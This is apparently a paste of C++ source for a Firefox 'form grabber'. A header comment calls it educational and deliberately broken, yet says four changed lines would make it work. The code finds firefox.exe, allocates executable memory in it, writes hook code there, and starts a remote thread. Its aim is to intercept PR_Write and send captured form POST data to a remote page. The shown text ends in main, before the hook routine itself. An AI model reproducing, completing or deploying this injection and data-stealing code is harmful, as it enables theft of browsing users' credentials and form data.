/*Ok, so firstly I created this purely for educational reasons. To prevent any F

1. /*Ok, so firstly I created this purely for educational reasons. To prevent any Feds attempting to have a early morning party v& dance this code will not work. (You could make it work by changing 4 lines)
2.  
3. If you get this working,use it maliciously and get arrested don't come crying to me.
4.  
5. Now that's out the way here is the form grabber. Blackhats commonly use scripts similar to this to "grab" details from websites you visit. It's a simple c++ script that can run on admin or lower rights accounts.
6.  
7.  
8. Remember this script is BROKEN. Firefox "patched" this method.*/
9.  
10. #include <stdio.h>
11. #include <windows.h>
12. #include <string.h>
13. #include <Tlhelp32.h>
14. #include <wininet.h>
15. #include <tchar.h>
16. #define HTTP_PORT 80
17. #define HTTP_POST "POST"
18. #define HTTP_POST_HEADER "Content-Type:application/x-www-form-urlencoded"
19. #define HTTP_REMOTE_SITE "localhost"
20. #define HTTP_REMOTE_PAGE "/postDemo.php"
21. #define FIREFOX_PROCESS TEXT("firefox.exe")
22. #define FIREFOX_PR_WRITE "PR_Write"
23. #define NSPR4_DLL "nspr4.dll"
24. #define WININET_DLL "wininet.dll"
25. #define KERNEL32_DLL "kernel32.dll"
26. #define HOOK_CODE_SIZE 2000
27. #define HOOK_ESP_DATA_OFFSET 0x08
28. #define HOOK_ESP_DATA_SIZE 0x0C
29. #define HOOK_ESP_ARG_0 0x04
30. #define HOOK_POST_CMP 0x54534F50 // = TSOP (POST)
31. #define HOOK_JMP 0xE9 // Jump near, relative, displacement relative to next instruction
32. #define HOOK_INT3 0xCC
33. #define HOOK_JMP_INST_SIZE 0x01
34. #define HOOK_INT3_SIZE 0x01
35. #define HOOK_ADDRESS_SIZE_32 0x04
36. #define HOOK_ADDRESS_SIZE_64 0x08
37. #define HOOK_REL_JMP_OFFSET_32 (HOOK_JMP_INST_SIZE + HOOK_ADDRESS_SIZE_32) // 5
38. #define HOOK_REL_JMP_OFFSET_64 (HOOK_JMP_INST_SIZE + HOOK_ADDRESS_SIZE_64) // 9
39. #define HOOK_PARAM1_OFFSET_32 0x08
40. #define HOOK_LOCALVAR1_OFFSET_32 0x04 // Should be
41. #define PR_WRITE_JMP_VP_SIZE 0x06 // 0x0A for 64 bits
42. typedef HMODULE (WINAPI *FnGetModuleHandle) (LPCTSTR);
43. typedef FARPROC (WINAPI *FnGetProcAddress) (HMODULE,LPCSTR);
44. typedef int (WINAPI *FnVirtualProtect) (LPVOID,SIZE_T,DWORD,PDWORD);
45. typedef HINTERNET (WINAPI *FnInternetOpen) (LPCTSTR,DWORD,LPCTSTR,LPCTSTR,DWORD);
46. typedef HINTERNET (WINAPI *FnInternetConnect)(HINTERNET,LPCTSTR,INTERNET_PORT,LPCTSTR,LPCTSTR,DWORD,DWORD,DWORD_PTR);
47. typedef HINTERNET (WINAPI *FnHttpOpenRequest) (HINTERNET,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR*,DWORD,DWORD_PTR);
48. typedef BOOL (WINAPI *FnHttpSendRequest)(HINTERNET,LPCTSTR,DWORD,LPVOID,DWORD);
49. typedef VOID (WINAPI *FnSleep)(DWORD);
50. typedef struct {
51. FnGetModuleHandle fnGetModuleHandle; // GetModuleHandle
52. FnGetProcAddress fnGetProcAddress; // GetProcAddress
53. FnVirtualProtect fnVirtualProtect; // VirtualProtect
54. FnSleep fnSleep; // Sleep
55. char nameNspr4[36]; // "nspr4.dll"
56. char namePR_Write[36]; // "PR_Write"
57. BYTE *PR_Write;
58. BYTE *nptr;
59. DWORD *bptr;
60. DWORD oldProtectValue;
61. char blank[3]; // ""
62. char remoteSite[16]; // "localhost"
63. char post[10]; // "POST"
64. char pageName[16]; // "/visit.php"
65. char header[64]; // "Content-Type:application/x-www-form-urlencoded"
66. HINTERNET fnOpenHandle;
67. HINTERNET fnConnectHandle;
68. HINTERNET internetHandle;
69. int postDataLength;
70. char *pPostData;
71. FnInternetOpen fnInternetOpen;
72. FnInternetConnect fnInternetConnect;
73. FnHttpOpenRequest fnHttpOpenRequest;
74. FnHttpSendRequest fnHttpSendRequest;
75. int addressSize; // 4, or 8 on 64 bit CPUs
76. } InjectData;
77. void Hook(InjectData *pData);
78. int main() {
79. InjectData data;
80. LPVOID pRemoteProgram, pRemoteMemory;
81. HANDLE rThread;
82. HMODULE kernel32;
83. HMODULE wininet;
84. HANDLE handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
85. PROCESSENTRY32 ProcessInfo;
86. ProcessInfo.dwSize = sizeof(PROCESSENTRY32);
87. LoadLibraryA( WININET_DLL );
88. wininet = GetModuleHandleA( WININET_DLL );
89. kernel32 = GetModuleHandleA( KERNEL32_DLL );
90. data.fnGetModuleHandle = (FnGetModuleHandle) GetProcAddress( kernel32,"GetModuleHandleA" );
91. data.fnGetProcAddress = (FnGetProcAddress) GetProcAddress( kernel32, "GetProcAddress" );
92. data.fnVirtualProtect = (FnVirtualProtect) GetProcAddress( kernel32, "VirtualProtect" );
93. data.fnSleep = (FnSleep) GetProcAddress( kernel32, "Sleep" );
94. data.fnInternetOpen = (FnInternetOpen) GetProcAddress( wininet, "InternetOpenA" );
95. data.fnInternetConnect = (FnInternetConnect) GetProcAddress( wininet, "InternetConnectA" );
96. data.fnHttpOpenRequest = (FnHttpOpenRequest) GetProcAddress( wininet, "HttpOpenRequestA" );
97. data.fnHttpSendRequest = (FnHttpSendRequest) GetProcAddress( wininet, "HttpSendRequestA" );
98. strcpy( data.nameNspr4, NSPR4_DLL );
99. strcpy( data.namePR_Write, FIREFOX_PR_WRITE );
100. strcpy( data.remoteSite, HTTP_REMOTE_SITE );
101. strcpy( data.post, HTTP_POST );
102. strcpy( data.pageName, HTTP_REMOTE_PAGE);
103. strcpy( data.header, HTTP_POST_HEADER );
104. strcpy( data.blank, "");
105. data.addressSize = sizeof( BYTE * ); // size of a pointer
106. while(Process32Next(handle, &ProcessInfo))
107. {
108. // strcmp on ANSI, wcscmp on UNICODE
109. if(! _tcscmp(ProcessInfo.szExeFile, FIREFOX_PROCESS))
110. {
111. HANDLE firefoxHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, ProcessInfo.th32ProcessID);
112. pRemoteMemory = VirtualAllocEx( firefoxHandle, NULL, sizeof(data), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
113. WriteProcessMemory(firefoxHandle, pRemoteMemory, &data, sizeof(data), NULL);
114. pRemoteProgram = VirtualAllocEx( firefoxHandle, NULL, HOOK_CODE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
115. WriteProcessMemory(firefoxHandle, pRemoteProgram, Hook, HOOK_CODE_SIZE, NULL);
116. rThread = CreateRemoteThread( firefoxHandle, NULL, 0, (LPTHREAD_START_ROUTINE) pRemoteProgram, pRemoteMemory, 0 ,NULL);
117. WaitForSingleObject( rThread, INFINITE);
118. CloseHandle(firefoxHandle);
119. }